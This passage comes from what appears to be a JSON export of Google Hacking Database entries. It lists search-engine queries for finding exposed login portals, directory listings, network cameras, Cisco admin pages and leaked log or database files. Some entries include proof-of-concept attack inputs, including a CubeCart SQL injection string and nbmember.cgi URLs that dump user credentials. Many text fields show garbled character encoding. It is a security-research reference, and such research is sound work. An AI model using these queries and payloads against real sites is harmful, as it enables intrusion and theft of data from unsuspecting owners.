        "textualDescription": "With Compulive News you can enter the details of your news items onto a webform and upload images through your browser. It integrates seamlessly within your website.When you open your CNU5 zip there is a news folder created with three subfolders: htmlarea, images and admin. In the news folder is your database file \u00c3\u0192\u00c2\u00a2\u00c3\u00a2\u00e2\u20ac\u0161\u00c2\u00ac\u00c3\u2039\u00c5\u201cnews.mdb\u00c3\u0192\u00c2\u00a2\u00c3\u00a2\u00e2\u20ac\u0161\u00c2\u00ac\u00c3\u00a2\u00e2\u20ac\u017e\u00c2\u00a2.For security purposes the manual recommends that you immediately rename this database to a name of your own choosing thereby making it harder for anyone to download your news database.The database contains the plain text password. PS: this search is based on the index.of method. There are other ways to find this software, but finding the news database becomes a lot more difficult for an attacker that way."
    }, 
    {
        "signatureReferenceNumber": "587", 
        "link": "https://www.exploit-db.com/ghdb/587/", 
        "category": "Advisories and Vulnerabilities", 
        "querystring": "http://www.google.com/search?num=100&hl=en&lr=&safe=off&c2coff=1&q=%22Copyright+%C2%A9+2002+Agustin+Dondo+Scripts%22&btnG=Search", 
        "shortDescription": "\"Copyright \u00c3\u0192\u00e2\u20ac\u0161\u00c3\u201a\u00c2\u00a9 2002 Agustin Dondo Scripts\"", 
        "textualDescription": "CoolPHP has multiple vulnerabilities:* Cross-Site Scripting vulnerability (index.php)* A Path Disclosure Vulnerability (index.php)* Local file include Vulnerability with Directory Traversal info: http://www.securityfocus.com/archive/1/378617"
    }, 
    {
        "signatureReferenceNumber": "588", 
        "link": "https://www.exploit-db.com/ghdb/588/", 
        "category": "Pages containing login portals", 
        "querystring": "http://www.google.com/search?q=%22IMail+Server+Web+Messaging%22+intitle:login&hl=en&lr=&filter=0", 
        "shortDescription": "\"IMail Server Web Messaging\" intitle:login", 
        "textualDescription": "IMail Server from Ipswitch is a messaging solution with 60 million users worldwide. It contains the features and safeguards you need without the complexity of expensive solutions like Microsoft Exchange\u00c3\u0192\u00e2\u20ac\u0161\u00c3\u201a\u00c2\u00ae or groupware which challenges even the most experienced administrators.This is a login portal search. Security Focus shows a list of vulnerabilities about this software."
    }, 
    {
        "signatureReferenceNumber": "589", 
        "link": "https://www.exploit-db.com/ghdb/589/", 
        "category": "Sensitive Directories", 
        "querystring": "http://www.google.com/search?hl=en&q=intitle%3A%22Directory+Listing+For%22+intext%3ATomcat+-intitle%3ATomcat", 
        "shortDescription": "intitle:\"Directory Listing For\" intext:Tomcat -intitle:Tomcat", 
        "textualDescription": "The Google Hackers Guide explains how to find Apache directory indexes, which are the most common found on the Internet. There are other ways however.This query is a generic search for servers using Tomcat with directory listings enabled. They are a bit more fancy than Apache's default lists and more importantly they will not be found using \"index.of\"."
    }, 
    {
        "signatureReferenceNumber": "590", 
        "link": "https://www.exploit-db.com/ghdb/590/", 
        "category": "Various Online Devices", 
        "querystring": "http://www.google.com/search?num=100&hl=en&lr=&safe=off&q=site%3A.viewnetcam.com+-www.viewnetcam.com", 
        "shortDescription": "site:.viewnetcam.com -www.viewnetcam.com", 
        "textualDescription": "The FREE viewnetcam.com service allows you to create a personal web address (e.g., http://bob.viewnetcam.com) at which your camera's live image can be found on the Internet. How the camera and service works: Special Software embedded within your Panasonic Network Camera gives your camera the ability to locate your unique Internet address. No matter what kind of Internet connection you have or which Internet provider you use, the viewnetcam.com service will keep your camera's Internet address permanent."
    }, 
    {
        "signatureReferenceNumber": "591", 
        "link": "https://www.exploit-db.com/ghdb/591/", 
        "category": "Network or vulnerability data", 
        "querystring": "http://www.google.com/search?hl=en&q=inurl%3A%2Fcgi-bin%2Ffinger%3F+Enter+%28account%7Chost%7Cuser%7Cusername%29+&btnG=Google+Search", 
        "shortDescription": "inurl:/cgi-bin/finger? Enter (account|host|user|username)", 
        "textualDescription": "The finger command on unix displays information about the system users. This search displays the webinterface for that command."
    }, 
    {
        "signatureReferenceNumber": "592", 
        "link": "https://www.exploit-db.com/ghdb/592/", 
        "category": "Network or vulnerability data", 
        "querystring": "http://www.google.com/search?q=inurl:/cgi-bin/finger%3F+%22In+real+life%22&num=100&hl=en&lr=&ie=UTF-8&filter=0", 
        "shortDescription": "inurl:/cgi-bin/finger? \"In real life\"", 
        "textualDescription": "The finger command on unix displays information about the system users. This search displays pre-fingered users, so an attacker wouldn't even have to guess their accounts."
    }, 
    {
        "signatureReferenceNumber": "593", 
        "link": "https://www.exploit-db.com/ghdb/593/", 
        "category": "Pages containing login portals", 
        "querystring": "http://www.google.com/search?hl=en&lr=&q=inurl%3A%22calendar.asp%3Faction%3Dlogin%22+&btnG=Search", 
        "shortDescription": "inurl:\"calendar.asp?action=login\"", 
        "textualDescription": "aspWebCalendar is a browser based software package that runs over a standard web browser, such as Internet Explorer from Microsoft, and allows an organization of any size to easily and cost effectively provide personal and group calendar functions to everyone in the organization.A vulnerability has been found for the (SQL version) script family from Full Revolution. Affected software is: aspWebAlbum, aspWebCalendar, aspWebHeadlines, aspWebMail. You can check it here: http://www.securityfocus.com/bid/11246Searches for aspWebAlbum and aspWebHeadlines:inurl:\"album.asp?action=login\"inurl:\"news.asp?action=login\""
    }, 
    {
        "signatureReferenceNumber": "594", 
        "link": "https://www.exploit-db.com/ghdb/594/", 
        "category": "Advisories and Vulnerabilities", 
        "querystring": "http://www.google.com/search?hl=en&lr=&ie=UTF-8&q=%22Powered+by+CubeCart%22&btnG=Search", 
        "shortDescription": "\"Powered by CubeCart\"", 
        "textualDescription": "--------------------------------------------------------Full path disclosure and sql injection on CubeCart 2.0.1--------------------------------------------------------[1]Introduction[2]The Problem[3]The Solution[4]Timeline[5]Feddback##############################################################[1]Introduction\"CubeCart is an eCommerce script written with PHP & MySQL. With CubeCart you can setup a powerful online store as long as youhave hosting supporting PHP and one MySQL database.\"This info was taken from hxxp://www.cubecart.comCubeCart, from Brooky (hxxp://www.brooky.com), is a software formerly known as eStore.[2]The ProblemA remote user can cause an error in index.php using the parameter 'cat_id' which is not properly validated, displaying thesoftware's full installation path. It can also be used to inject sql commands. Examples follow:(a) http://example.com/store/index.php?cat_id='causes an error like this:\"Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in/home/example/public_html/store/link_navi.php on line 35Warning: mysql_num_rows(): supplied argument is not a valid MySQL result resource in/home/example/public_html/store/index.php on line 170Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in/home/example/public_html/store/index.php on line 172\"(b) http://example.com/store/index.php?cat_id=1 or 1=1--displays all categories in the database[3]The SolutionNone at this time.Vendor contacted and fix will be avaliable soon.[4]Timeline(2/10/2004) Vulnerability discovered(2/10/2004) Vendor notified(3/10/2004) Vendor response[5]FeedbackComments and stuff to cybercide@megamail.pt"
    }, 
    {
        "signatureReferenceNumber": "595", 
        "link": "https://www.exploit-db.com/ghdb/595/", 
        "category": "Pages containing login portals", 
        "querystring": "http://www.google.com/search?hl=en&lr=&ie=UTF-8&newwindow=1&q=inurl%3Aconfixx+inurl%3Alogin%7Canmeldung&btnG=Search", 
        "shortDescription": "inurl:confixx inurl:login|anmeldung", 
        "textualDescription": "Confixx is a webhosting management tool and has the following features: * create resellers, * edit personal data, * manage newsletters to resellers, * comprehensive stats, * powerful evaluation of traffic, * manage e-mail templates, * lock resellers. security focus has a vulnerability report on this.vendor: http://www.sw-soft.com/en/products/confixx/"
    }, 
    {
        "signatureReferenceNumber": "596", 
        "link": "https://www.exploit-db.com/ghdb/596/", 
        "category": "Pages containing login portals", 
        "querystring": "http://www.google.com/search?q=%22VHCS+Pro+++ver%22+-demo&num=100&hl=en&lr=&newwindow=1&c2coff=1&safe=off&filter=0", 
        "shortDescription": "\"VHCS Pro   ver\" -demo", 
        "textualDescription": "VHCS is professional Control Panel Software for Shared, Reseller, vServer and Dedicated Servers.No vulnerabilities are reported to security focus."
    }, 
    {
        "signatureReferenceNumber": "597", 
        "link": "https://www.exploit-db.com/ghdb/597/", 
        "category": "Pages containing login portals", 
        "querystring": "http://www.google.com/search?hl=en&lr=&ie=UTF-8&newwindow=1&q=intitle%3A%22Virtual+Server+Administration+System%22", 
        "shortDescription": "intitle:\"Virtual Server Administration System\"", 
        "textualDescription": "VISAS, German control panel software like confixx.No vulnerabilities are reported to security focus."
    }, 
    {
        "signatureReferenceNumber": "598", 
        "link": "https://www.exploit-db.com/ghdb/598/", 
        "category": "Pages containing login portals", 
        "querystring": "http://www.google.com/search?hl=en&lr=&ie=UTF-8&newwindow=1&q=%22SysCP+-+login%22", 
        "shortDescription": "\"SysCP - login\"", 
        "textualDescription": "sysCP: Open Source server management tool for Debian LinuxNo vulnerabilities are reported to security focus."
    }, 
    {
        "signatureReferenceNumber": "599", 
        "link": "https://www.exploit-db.com/ghdb/599/", 
        "category": "Pages containing login portals", 
        "querystring": "http://www.google.com/search?hl=en&lr=&ie=UTF-8&newwindow=1&q=intitle%3A%22ISPMan+%3A+Unauthorized+Access+prohibited%22&btnG=Search", 
        "shortDescription": "intitle:\"ISPMan : Unauthorized Access prohibited\"", 
        "textualDescription": "ISPMan is a distributed system to manage components of ISP from a central management interface.No vulnerabilities are reported to security focus."
    }, 
    {
        "signatureReferenceNumber": "600", 
        "link": "https://www.exploit-db.com/ghdb/600/", 
        "category": "Pages containing login portals", 
        "querystring": "http://www.google.com/search?hl=en&lr=&ie=UTF-8&newwindow=1&q=%22Login+-+Sun+Cobalt+RaQ%22", 
        "shortDescription": "\"Login - Sun Cobalt RaQ\"", 
        "textualDescription": "The famous Sun linux appliance. Nice clean portal search.Various vulnerabilities are reported to security focus."
    }, 
    {
        "signatureReferenceNumber": "601", 
        "link": "https://www.exploit-db.com/ghdb/601/", 
        "category": "Pages containing login portals", 
        "querystring": "http://www.google.com/search?hl=en&lr=&ie=UTF-8&newwindow=1&q=%22OPENSRS+Domain+Management%22+inurl%3Amanage.cgi", 
        "shortDescription": "\"OPENSRS Domain Management\" inurl:manage.cgi", 
        "textualDescription": "OpenSRS Domain Management SystemNo vulnerabilities are reported to security focus."
    }, 
    {
        "signatureReferenceNumber": "602", 
        "link": "https://www.exploit-db.com/ghdb/602/", 
        "category": "Pages containing login portals", 
        "querystring": "http://www.google.com/search?hl=en&lr=&ie=UTF-8&newwindow=1&q=intitle%3Aplesk+inurl%3Alogin.php3", 
        "shortDescription": "intitle:plesk inurl:login.php3", 
        "textualDescription": "Plesk is server management software developed for the Hosting Service Industry. Various vulnerabilities are reported to security focus."
    }, 
    {
        "signatureReferenceNumber": "603", 
        "link": "https://www.exploit-db.com/ghdb/603/", 
        "category": "Various Online Devices", 
        "querystring": "http://www.google.com/search?q=inurl:%22level/15/exec/-/show%22&num=100&hl=en&lr=&c2coff=1&safe=off&filter=0", 
        "shortDescription": "inurl:\"level/15/exec/-/show\"", 
        "textualDescription": "This search finds Cisco devices which have level 15 access open via webinterface. If an attacker wants to search for another level he can replace the \"15\" with this level. Levels below 10 need a leading zero (e.g. 04).Currently only the cached pages can be viewed."
    }, 
    {
        "signatureReferenceNumber": "604", 
        "link": "https://www.exploit-db.com/ghdb/604/", 
        "category": "Pages containing login portals", 
        "querystring": "http://www.google.com/search?hl=en&lr=&ie=UTF-8&q=inurl%3A%2Fdana-na%2Fauth%2Fwelcome.html&btnG=Search&X=1&filter=0", 
        "shortDescription": "inurl:/dana-na/auth/welcome.html", 
        "textualDescription": "Neoteris Instant Virtual Extranet (IVE) has been reported prone to a cross-site scripting vulnerability.The issue presents itself, due to a lack of sufficient sanitization performed on an argument passed to an IVE CGI script. An attacker may exploit this vulnerability to hijack valid Neoteris IVE sessions.advisories: http://secunia.com/product/1558/http://www.securityfocus.com/bid/7510"
    }, 
    {
        "signatureReferenceNumber": "605", 
        "link": "https://www.exploit-db.com/ghdb/605/", 
        "category": "Files containing juicy info", 
        "querystring": "http://www.google.com/search?hl=en&q=ext%3Ansf+nsf+-gov+-mil", 
        "shortDescription": "ext:nsf nsf -gov -mil", 
        "textualDescription": "Domino is server technology which transforms Lotus Notes\u00c3\u0192\u00e2\u20ac\u0161\u00c3\u201a\u00c2\u00ae into an Internet applications server. Domino brings together the open networking environment of Internet standards and protocols with the powerful application development facilities of Notes, providing you with the ability to rapidly develop a broad range of business applications for the Internet and Intranet.This is a generic search for Lotus Domino files. It identifies Domino users. Search the GBDB for more variations on this theme."
    }, 
    {
        "signatureReferenceNumber": "606", 
        "link": "https://www.exploit-db.com/ghdb/606/", 
        "category": "Network or vulnerability data", 
        "querystring": "http://www.google.com/search?num=100&hl=en&lr=&safe=off&c2coff=1&q=inurl%3Astatrep.nsf+-gov", 
        "shortDescription": "inurl:statrep.nsf -gov", 
        "textualDescription": "Domino is server technology which transforms Lotus Notes\u00c3\u0192\u00e2\u20ac\u0161\u00c3\u201a\u00c2\u00ae into an Internet applications server. Domino brings together the open networking environment of Internet standards and protocols with the powerful application development facilities of Notes, providing you with the ability to rapidly develop a broad range of business applications for the Internet and Intranet. This search finds statistics pages generated by Domino. Information on these pages includes Operating System, Disk space, Usernames and full path disclosure.Example:    * 1. Statistics Reports - 1. System    * 1. Statistics Reports - 2. Mail & Database    * 1. Statistics Reports - 3. Communications    * 1. Statistics Reports - 4. Network    * 1. Statistics Reports - 5. Clusters    * 1. Statistics Reports - 6. Web Server & Retriever    * 1. Statistics Reports - 7. Calendaring Scheduling    * 2. Alarms    * 3. Events    * 4. Spreadsheet Export    * 5. Graphs - 1. System Statistics    * 5. Graphs - 2. System Loads    * 5. Graphs - 3. System Resources    * 6. Trouble Tickets - 1. Alarm    * 6. Trouble Tickets - 2. Event    * 7. Analysis Report    * 8. File Statistics    * 9. Single Copy Object Store Statistics"
    }, 
    {
        "signatureReferenceNumber": "607", 
        "link": "https://www.exploit-db.com/ghdb/607/", 
        "category": "Files containing juicy info", 
        "querystring": "http://www.google.com/search?num=100&hl=en&lr=&safe=off&c2coff=1&q=inurl%3Alog.nsf+-gov", 
        "shortDescription": "inurl:log.nsf -gov", 
        "textualDescription": "Domino is server technology which transforms Lotus Notes\u00c3\u0192\u00e2\u20ac\u0161\u00c3\u201a\u00c2\u00ae into an Internet applications server. Domino brings together the open networking environment of Internet standards and protocols with the powerful application development facilities of Notes, providing you with the ability to rapidly develop a broad range of business applications for the Internet and Intranet. This search finds Domino log files. These can be revealing, including information about dbconnect.nsf files, path information, etc.Example:    * Database-Sizes    * Database-Usage    * Mail Routing Events    * Miscellaneous Events    * NNTP Events    * Object Store Usage    * Passthru Connections    * Phone Calls-By Date    * Phone Calls-By User    * Replication Events    * Sample Billing    * Usage-By Date    * Usage-By UserExample:2004/04/14 07:51:00 AM ATTEMPT TO ACCESS DATABASE mtstore.ntf by itisdom/ITIS/ITRI was denied"
    }, 
    {
        "signatureReferenceNumber": "608", 
        "link": "https://www.exploit-db.com/ghdb/608/", 
        "category": "Pages containing login portals", 
        "querystring": "http://www.google.com/search?hl=en&lr=&client=firefox-a&q=inurl%3Alogin.php+%22SquirrelMail+version%22&btnG=Search", 
        "shortDescription": "inurl:login.php \"SquirrelMail version\"", 
        "textualDescription": "squirrelMail is a standards-based webmail package written in PHP4. It includes built-in pure PHP support for the IMAP and SMTP protocols, and all pages render in pure HTML 4.0 (with no JavaScript required) for maximum compatibility across browsers. It has very few requirements and is very easy to configure and install. SquirrelMail has all the functionality you would want from an email client, including strong MIME support, address books, and folder manipulation."
    }, 
    {
        "signatureReferenceNumber": "609", 
        "link": "https://www.exploit-db.com/ghdb/609/", 
        "category": "Advisories and Vulnerabilities", 
        "querystring": "http://www.google.com/search?hl=en&ie=ISO-8859-1&q=%22Ideal+BB+Version%3A+0.1%22+-idealbb.com&btnG=Google-Suche&meta=", 
        "shortDescription": "\"Ideal BB Version: 0.1\" -idealbb.com", 
        "textualDescription": "Ideal BB has been a popular choice for powering web based bulletin boards and we are now proud to introduce our next generation bulletin board Ideal BB.NET. Ideal Science IdealBB is reported prone to multiple unspecified input validation vulnerabilities. These issues result from insufficient sanitization of user-supplied data. Securityfocus currently has 3 reports idealBB."
    }, 
    {
        "signatureReferenceNumber": "610", 
        "link": "https://www.exploit-db.com/ghdb/610/", 
        "category": "Footholds", 
        "querystring": "http://www.google.com/search?hl=en&lr=&client=firefox-a&q=%28inurl%3A81%2Fcgi-bin%2F.cobalt%2F%29++%7C+%28intext%3A%22Welcome+to+the+Cobalt+RaQ%22+%29&btnG=Search", 
        "shortDescription": "(inurl:81/cgi-bin/.cobalt/)  | (intext:\"Welcome to the Cobalt RaQ\")", 
        "textualDescription": "The famous Sun linux appliance. The default page displays this text:\"Congratulations on Choosing a Cobalt RaQ - the premier server appliance platform for web hosting. This page can easily be replaced with your own page. To replace this page, transfer your new content to the directory /home/sites/home/web\"."
    }, 
    {
        "signatureReferenceNumber": "611", 
        "link": "https://www.exploit-db.com/ghdb/611/", 
        "category": "Advisories and Vulnerabilities", 
        "querystring": "http://www.google.com/search?hl=en&q=%22Powered+by+YaPig+V0.92b%22&btnG=Google+Search", 
        "shortDescription": "\"Powered by YaPig V0.92b\"", 
        "textualDescription": "YaPiG is reported to contain an HTML injection vulnerability. The problem is reported to present itself due to a lack of sanitization performed on certain field data.This may allow an attacker to inject malicious HTML and script code into the application.http://www.securityfocus.com/bid/11452"
    }, 
    {
        "signatureReferenceNumber": "612", 
        "link": "https://www.exploit-db.com/ghdb/612/", 
        "category": "Various Online Devices", 
        "querystring": "http://www.google.com/search?hl=en&ie=ISO-8859-1&q=intitle%3A%22toshiba+network+camera+-+User+Login%22&btnG=Suche&meta=", 
        "shortDescription": "intitle:\"toshiba network camera - User Login\"", 
        "textualDescription": "Web interface of Toshiba network cameras."
    }, 
    {
        "signatureReferenceNumber": "613", 
        "link": "https://www.exploit-db.com/ghdb/613/", 
        "category": "Advisories and Vulnerabilities", 
        "querystring": "http://www.google.com/search?hl=en&ie=ISO-8859-1&q=inurl%3A%22%2Fsite%2Farticles.asp%3Fidcategory%3D%22+&btnG=Google-Suche&meta=", 
        "shortDescription": "inurl:\"/site/articles.asp?idcategory=\"", 
        "textualDescription": "Dwc_Articles is an ASP application designed to add Featured,  Recent and Popular News through an easy to use administration area.  Other features: Design Packages, Add, Modify, Deactive through HTML/Wysiwyg Editor,  Nearly all scripts suffer from possible sql injections. http://www.securityfocus.com/bid/11509"
    }, 
    {
        "signatureReferenceNumber": "614", 
        "link": "https://www.exploit-db.com/ghdb/614/", 
        "category": "Sensitive Directories", 
        "querystring": "http://www.google.com/search?q=index.of.dcim&sourceid=mozilla-search&start=0&start=0&ie=utf-8&oe=utf-8", 
        "shortDescription": "index.of.dcim", 
        "textualDescription": "The DCIM directory is the default name for a few brands of digital camers. This is not a big network security risk, but like netcams it can reveal juicy details if found on corporate intranets."
    }, 
    {
        "signatureReferenceNumber": "615", 
        "link": "https://www.exploit-db.com/ghdb/615/", 
        "category": "Vulnerable Files", 
        "querystring": "http://www.google.com/search?q=intitle%3A%22phpremoteview%22+filetype%3Aphp+%22Name%2C+Size%2C+Type%2C+Modify%22", 
        "shortDescription": "intitle:\"phpremoteview\" filetype:php \"Name, Size, Type, Modify\"", 
        "textualDescription": "phpRemoteView is webbased filemanger with a basic shell. With this an attacker can browse the server filesystem use the online php interpreter.vendor: http://php.spb.ru/remview/ (russian)"
    }, 
    {
        "signatureReferenceNumber": "616", 
        "link": "https://www.exploit-db.com/ghdb/616/", 
        "category": "Sensitive Directories", 
        "querystring": "http://www.google.com/search?q=intitle%3A%22index+of%22+-inurl%3Ahtm+-inurl%3Ahtml+mp3", 
        "shortDescription": "intitle:\"index of\" -inurl:htm -inurl:html mp3", 
        "textualDescription": "Yes!  I probably have should have told you guys earlier, but this is how ive been getting 100% of my mp3s.  It fricken rocks, use it and abuse it.  Downfalls to it...  a)sometimes you shouldnt include mp3 in the query and getting what you want takes several different methods of searching b)a lot of the time google gives you results and they are not there thanks to good old friend 404 c)finding stuff takes a lot of practice.  Goods...  a)ive found whole albums b)ive mass downloaded directories of hundreds of songs that i have intrest in c)its exciting seeing the results, like fining treasure."
    }, 
    {
        "signatureReferenceNumber": "617", 
        "link": "https://www.exploit-db.com/ghdb/617/", 
        "category": "Files containing juicy info", 
        "querystring": "http://www.google.com/search?num=100&q=intitle%3A%22Index+of%22+upload+size+parent+directory", 
        "shortDescription": "intitle:\"Index of\" upload size parent directory", 
        "textualDescription": "Files uploaded through ftp by other people, sometimes you can find all sorts of things from movies to important stuff."
    }, 
    {
        "signatureReferenceNumber": "618", 
        "link": "https://www.exploit-db.com/ghdb/618/", 
        "category": "Advisories and Vulnerabilities", 
        "querystring": "http://www.google.com/search?num=100&hl=en&lr=&safe=off&c2coff=1&q=filetype%3Acgi+inurl%3Anbmember.cgi&btnG=Search", 
        "shortDescription": "filetype:cgi inurl:nbmember.cgi", 
        "textualDescription": "vulnerable Netbilling nbmember.cgiNetbilling 'nbmember.cgi' script is reported prone to an information disclosure vulnerability. This issue may allow remote attackers to gain access to user authentication credentials and potentially sensitive configuration information.The following proof of concept is available:http://www.example.com/cgi-bin/nbmember.cgi?cmd=testhttp://www.example.com/cgi-bin/nbmember.cgi?cmd=list_all_users&keyword=hereistheaccesskeywordhttp://www.securityfocus.com/bid/11504"
    }, 
    {
        "signatureReferenceNumber": "619", 
        "link": "https://www.exploit-db.com/ghdb/619/", 
        "category": "Advisories and Vulnerabilities", 
        "querystring": "http://www.google.com/search?hl=en&q=%22Powered+by+Coppermine+Photo+Gallery%22+&btnG=Google+Search", 
        "shortDescription": "\"Powered by Coppermine Photo Gallery\"", 
        "textualDescription": "published Oct 20, 2004, updated Oct 20, 2004vulnerable:Coppermine Photo Gallery Coppermine Photo Gallery 1.0Coppermine Photo Gallery Coppermine Photo Gallery 1.1Coppermine Photo Gallery Coppermine Photo Gallery 1.2Coppermine Photo Gallery Coppermine Photo Gallery 1.2.1Coppermine Photo Gallery Coppermine Photo Gallery 1.3Coppermine Photo Gallery Coppermine Photo Gallery 1.3.1Coppermine Photo Gallery Coppermine Photo Gallery 1.3.2Coppermine Photo Gallery is reported prone to a design error that may allow users to cast multiple votes for a picture.All versions of Coppermine Photo Gallery are considered vulnerable at the moment.http://www.securityfocus.com/bid/11485"
    }, 
    {
        "signatureReferenceNumber": "620", 
        "link": "https://www.exploit-db.com/ghdb/620/", 
        "category": "Advisories and Vulnerabilities", 
        "querystring": "http://www.google.com/search?hl=en&q=%22Powered+by+WowBB%22+-site%3Awowbb.com+&btnG=Google+Search", 
        "shortDescription": "\"Powered by WowBB\" -site:wowbb.com", 
        "textualDescription": "WowBB is reportedly affected by multiple input validation vulnerabilities. These issues are due to a failure of the application to properly sanitize user-supplied input prior to including it in dynamic web content and SQL database queries.An attacker can leverage these issues to manipulate or reveal database contents through SQL injection attacks as well as carry out other attacks and steal cookie-based authentication credentials through cross-site scripting attacks.http://www.securityfocus.com/bid/11429http://www.wowbb.com/"
    }, 
    {
        "signatureReferenceNumber": "621", 
        "link": "https://www.exploit-db.com/ghdb/621/", 
        "category": "Advisories and Vulnerabilities", 
        "querystring": "http://www.google.com/search?hl=en&q=%22Powered+by+ocPortal%22+-demo+-ocportal.com+&btnG=Google+Search", 
        "shortDescription": "\"Powered by ocPortal\" -demo -ocportal.com", 
        "textualDescription": "Reportedly ocPortal is affected by a remote file include vulnerability. This issue is due to a failure of the application to sanitize user supplied URI input.An attacker might leverage this issue to run arbitrary server side script code on a vulnerable computer with the privileges of the web server process. This may potentially result in a compromise of the vulnerable computer as well as other attacks.http://www.securityfocus.com/bid/11368"
    }, 
    {
        "signatureReferenceNumber": "622", 
        "link": "https://www.exploit-db.com/ghdb/622/", 
        "category": "Advisories and Vulnerabilities", 
        "querystring": "http://www.google.com/search?num=100&hl=en&lr=&safe=off&c2coff=1&q=inurl%3A%22slxweb.dll%22+&btnG=Search", 
        "shortDescription": "inurl:\"slxweb.dll\"", 
        "textualDescription": "salesLogix is the Customer Relationship Management solution thatdrives  sales performance in small to medium-sized businesses through Sales, Marketing, and Customer Support automation and back-office integration.The problem:By manipulating the cookies used by the Web Client, it is possible totrick the  server into authenticating a remote user as the CRM administrator without requiring a password.  It is also possible to perform SQL injection attacks on the SQL serverthat is used as the data store for the SalesLogix CRM system, reveal detailed error reports contained in HTTP headers and disclose the real filesystem paths to various SalesLogix directories. The SalesLogix server itself is vulnerable to an attack that wouldallow a malicious user to obtain the username and password used to access the SQL server used as a data store. The disclosed username and password always have read/write permissions on the database. Another vulnerability in the SalesLogix server allows anunauthenticated user to upload arbitrary files to the server in any directory (s)he chooses.http://www.securityfocus.com/bid/11450"
    }, 
    {
        "signatureReferenceNumber": "623", 
        "link": "https://www.exploit-db.com/ghdb/623/", 
        "category": "Advisories and Vulnerabilities", 
        "querystring": "http://www.google.com/search?hl=en&q=%22Powered+by+DMXReady+Site+Chassis+Manager%22+-site%3Admxready.com&btnG=Google+Search", 
        "shortDescription": "\"Powered by DMXReady Site Chassis Manager\" -site:dmxready.com", 
        "textualDescription": "It is reported that DMXReady Site Chassis Manager is susceptible to two remotely exploitable input validation vulnerabilities. These vulnerabilities are due to a failure of the application to properly sanitize user-supplied data.The first issue is an unspecified cross-site scripting vulnerability. This issue could permit a remote attacker to create a malicious URI link that includes hostile HTML and script code. If this link were to be followed, the hostile code may be rendered in the web browser of the victim user. This would occur in the security context of the affected web site and may allow for theft of cookie-based authentication credentials or other attacks.The second issue is an unspecified SQL injection vulnerability. It may be possible for a remote user to inject arbitrary SQL queries into the underlying database used by the application. This could permit remote attackers to pass malicious input to database queries, resulting in modification of query logic or other attacks.Successful exploitation could result in compromise of the application, disclosure or modification of data or may permit an attacker to exploit vulnerabilities in the underlying database implementation."
    }, 
    {
        "signatureReferenceNumber": "624", 
        "link": "https://www.exploit-db.com/ghdb/624/", 
        "category": "Advisories and Vulnerabilities", 
        "querystring": "http://www.google.com/search?num=100&hl=en&lr=&safe=off&c2coff=1&q=%22Powered+by+My+Blog%22+intext%3A%22FuzzyMonkey.org%22&btnG=Search", 
        "shortDescription": "\"Powered by My Blog\" intext:\"FuzzyMonkey.org\"", 
        "textualDescription": "FuzzyMonkey My Blog is vulnerable to multiple input validation vulnerabilities. These issues are caused by a failure to validate and filter user-supplied strings before including them in dynamic Web page content.An attacker could leverage these issues to carry out cross-site scripting attacks against unsuspecting users, facilitating theft of cookie-based authentication credentials as well as other attacks.vulnerable FuzzyMonkey My Blog 1.15FuzzyMonkey My Blog 1.16FuzzyMonkey My Blog 1.17FuzzyMonkey My Blog 1.18FuzzyMonkey My Blog 1.19FuzzyMonkey My Blog 1.20not vulnerable FuzzyMonkey My Blog 1.21 They also have several other scripts, which may or may not be vulnerable. But remember Murphy's law also applies to software writers.# My Photo Gallery (picture and file sharing software)# My Calendar (quick and easy web calendar)# My Voting Script# My Guestbookhttp://www.securityfocus.com/bid/11325"
    }, 
    {
        "signatureReferenceNumber": "625", 
        "link": "https://www.exploit-db.com/ghdb/625/", 
        "category": "Advisories and Vulnerabilities", 
        "querystring": "http://www.google.com/search?num=100&hl=en&lr=&safe=off&c2coff=1&q=inurl%3Awiki%2FMediaWiki&btnG=Search", 
        "shortDescription": "inurl:wiki/MediaWiki", 
        "textualDescription": "MediaWiki is reported prone to a cross-site scripting vulnerability. This issue arises due to insufficient sanitization of user-supplied data. A remote attacker may exploit this vulnerability to execute arbitrary HTML and script code in the browser of a vulnerable user.bugtraq id 11480objectclass Input Validation Errorcve CVE-MAP-NOMATCHremote Yeslocal Nopublished Oct 18, 2004updated Oct 20, 2004vulnerable MediaWiki MediaWiki 1.3MediaWiki MediaWiki 1.3.1MediaWiki MediaWiki 1.3.2MediaWiki MediaWiki 1.3.3MediaWiki MediaWiki 1.3.4MediaWiki MediaWiki 1.3.5MediaWiki MediaWiki 1.3.6not vulnerable MediaWiki MediaWiki 1.3.7"
    }, 
    {
        "signatureReferenceNumber": "626", 
        "link": "https://www.exploit-db.com/ghdb/626/", 
        "category": "Advisories and Vulnerabilities", 
        "querystring": "http://www.google.com/search?hl=en&q=%22inurl%3A%2Fsite%2Farticles.asp%3Fidcategory%3D%22+&btnG=Google+Search", 
        "shortDescription": "\"inurl:/site/articles.asp?idcategory=\"", 
        "textualDescription": "Dwc_Articles, is an ASP application designed to add Featured, Recent and Popular News through an easy to use administration area. Other features: Design Packages, Add, Modify, Deactive through HTML/Wysiwyg Editor, Upload, categories, Multiple Users and more.Nearly all scripts suffer from possible sql injections. This may lead an attacker to change websites content or even worse, a login as an admin.vulnerable:"
    }, 
    {
        "signatureReferenceNumber": "627", 
        "link": "https://www.exploit-db.com/ghdb/627/", 
        "category": "Advisories and Vulnerabilities", 
        "querystring": "http://www.google.com/search?hl=en&lr=&c2coff=1&client=firefox-a&q=%22Enter+ip%22+inurl%3A%22php-ping.php%22&btnG=Search", 
        "shortDescription": "\"Enter ip\" inurl:\"php-ping.php\"", 
        "textualDescription": "It has been reported that php-ping may be prone to a remote command execution vulnerability that may allow remote attackers to execute commands on vulnerable systems. The problem exists due to insufficient sanitization of shellmetacharacters via the 'count' parameter of php-ping.php script.report: http://www.securityfocus.com/bid/9309/info/sample: http://img64.exs.cx/my.php?loc=img64&image=phpping.jpg"
    }, 
    {
        "signatureReferenceNumber": "628", 
        "link": "https://www.exploit-db.com/ghdb/628/", 
        "category": "Vulnerable Files", 
        "querystring": "http://www.google.com/search?hl=en&lr=&ie=ISO-8859-1&q=%22File+Upload+Manager+v1.3%22+%22rename+to%22&btnG=Search", 
        "shortDescription": "\"File Upload Manager v1.3\" \"rename to\"", 
        "textualDescription": "thepeak file upload manager let you manage your webtree with up and downloading files."
    }, 
    {
        "signatureReferenceNumber": "629", 
        "link": "https://www.exploit-db.com/ghdb/629/", 
        "category": "Vulnerable Files", 
        "querystring": "http://www.google.com/search?hl=en&lr=&ie=ISO-8859-1&q=inurl%3Aclick.php+intext%3APHPClickLog+%0D%0A&btnG=Search", 
